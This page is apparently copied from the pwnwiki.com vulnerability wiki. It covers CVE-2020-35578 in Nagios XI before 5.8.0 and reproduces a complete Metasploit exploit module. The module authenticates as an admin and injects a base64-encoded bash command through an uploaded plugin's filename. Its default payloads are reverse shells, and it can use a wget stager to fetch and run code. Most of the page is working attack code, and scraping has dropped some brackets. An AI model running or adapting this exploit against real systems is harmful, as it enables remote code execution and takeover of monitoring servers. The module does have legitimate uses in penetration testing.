Loading
0

CVE-2020-35578 Nagios XI 远程命令执行漏洞

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

INFO

This Metasploit module exploits a command injection vulnerability in the /admin/monitoringplugins.php page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows an authenticated admin user to achieve remote code execution as the apache user by uploading a malicious plugin. Valid credentials for a Nagios XI admin user are required. This module has been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both running on CentOS 7.

EXP

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::NagiosXi
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection',
        'Description' => %q{
          This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php`
          page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows
          an authenticated admin user to achieve remote code execution as the `apache` user by uploading
          a malicious plugin.

          Valid credentials for a Nagios XI admin user are required. This module has
          been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both
          running on CentOS 7.
        },
        'License' => MSF_LICENSE,
        'Author' =>
          
            'Haboob Team', # https://haboob.sa - PoC
            'Erik Wynter' # @wyntererik - Metasploit'
          ,
        'References' =>
          
            'CVE', '2020-35578',
            'EDB', '49422'
          ,
        'Platform' => %wlinux unix,
        'Arch' =>  ARCH_X86, ARCH_X64, ARCH_CMD,
        'Targets' =>
          
            
              'Linux (x86/x64)', {
                'Arch' => ARCH_X86, ARCH_X64,
                'Platform' => 'linux',
                # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation
                'CmdStagerFlavor' => :wget,
                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
              }
            ,
            
              'CMD', {
                'Arch' => ARCH_CMD,
                'Platform' => 'unix',
                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
              }
            
          ,
        'Privileged' => false,
        'DisclosureDate' => '2020-12-19',
        'DefaultTarget' => 0,
        'Notes' =>
          {
            'Stability' =>  CRASH_SAFE ,
            'SideEffects' =>  ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ,
            'Reliability' => FIRST_ATTEMPT_FAIL # payload may not connect back the first time
          }
      )
    )

    register_options 
      OptString.new('USERNAME', true, 'Username to authenticate with', 'nagiosadmin'),
      OptString.new('PASSWORD', true, 'Password to authenticate with', nil)
    
  end

  def username
    datastore'USERNAME'
  end

  def password
    datastore'PASSWORD'
  end

  def finish_install
    datastore'FINISH_INSTALL'
  end

  def check
    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
    # an array containing the http response body of a get request to index.php and the session cookies
    login_result, res_array = nagios_xi_login(username, password, finish_install)
    case login_result
    when 1..3 # An error occurred
      return CheckCode::Unknown(res_array0)
    when 4 # Nagios XI is not fully installed
      install_result = install_nagios_xi(password)
      if install_result
        return CheckCode::Unknown(install_result1)
      end

      login_result, res_array = login_after_install_or_license(username, password, finish_install)
      case login_result
      when 1..3 # An error occurred
        return CheckCode::Unknown(res_array0)
      when 4 # Nagios XI is still not fully installed
        return CheckCode::Detected('Failed to install Nagios XI on the target.')
      end
    end

    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
    if login_result == 5 # the Nagios XI license agreement has not been signed
      auth_cookies, nsp = res_array
      sign_license_result = sign_license_agreement(auth_cookies, nsp)
      if sign_license_result
        return CheckCode::Unknown(sign_license_result1)
      end

      login_result, res_array = login_after_install_or_license(username, password, finish_install)
      case login_result
      when 1..3
        return CheckCode::Unknown(res_array0)
      when 5 # the Nagios XI license agreement still has not been signed
        return CheckCode::Detected('Failed to sign the license agreement.')
      end
    end

    print_good('Successfully authenticated to Nagios XI')

    # Obtain the Nagios XI version
    @auth_cookies = res_array1 # if we are here, this cannot be nil since the mixin checks for that already

    nagios_version = nagios_xi_version(res_array0)
    if nagios_version.nil?
      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
    end

    print_status("Target is Nagios XI with version #{nagios_version}")
    # check if the target is actually vulnerable
    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\dA-Ha-h/.match(nagios_version) || nagios_version == '5R1.0'
      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
    end
    @version = Rex::Version.new(nagios_version)
    if @version < Rex::Version.new('5.8.0')
      return CheckCode::Appears
    end

    return CheckCode::Safe
  end

  def execute_command(cmd, _opts = {})
    # Convert the payload to hex ASCII and then Base64 encode the payload.
    # This is necessary for the exploit to work.
    payload_ascii = Rex::Text.to_hex_ascii(cmd)
    payload_base64 = Rex::Text.encode_base64(payload_ascii)
    payload = ";echo #{payload_base64} | base64 -d | bash;#"
    register_file_for_cleanup("/usr/local/nagios/libexec/#{payload}") # deleting the payload via the web interface doesn't seem possible

    # generate post data
    post_data = Rex::MIME::Message.new
    random_post_content = rand_text_alphanumeric(8..12)
    post_data.add_part('', nil, nil, 'form-data; name="upload"')
    post_data.add_part(@nsp, nil, nil, 'form-data; name="nsp"')
    post_data.add_part(random_post_content, 'text/plain', nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload}\"")
    post_data.add_part('1', nil, nil, 'form-data; name="convert_to_unix"')

    # upload payload
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => @auth_cookies,
      'data' => post_data.to_s
    }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
  end

  def exploit
    if @version < Rex::Version.new('5.3.0')
      fail_with(Failure::NoTarget, 'Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!')
    end

    # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
      'cookie' => @auth_cookies
    })

    unless res
      fail_with(Failure::Disconnected, "Connection failed while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
    end

    unless res.code == 200 && res.body.include?('<title>Manage Plugins · Nagios XI</title>')
      fail_with(Failure::UnexpectedReply, "Unexpected response received while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
    end

    # grab the nsp token, using the Nagios XI mixin
    @nsp = get_nsp(res)

    if @nsp.blank?
      fail_with(Failure::Unknown, 'Failed to obtain the nsp token required to upload the payload')
    end

    if target.arch.first == ARCH_CMD
      print_status('Executing the payload')
      execute_command(payload.encoded)
    else
      execute_cmdstager(background: true)
    end
  end
end

免费、自由、人人可编辑的漏洞库--PwnWiki.com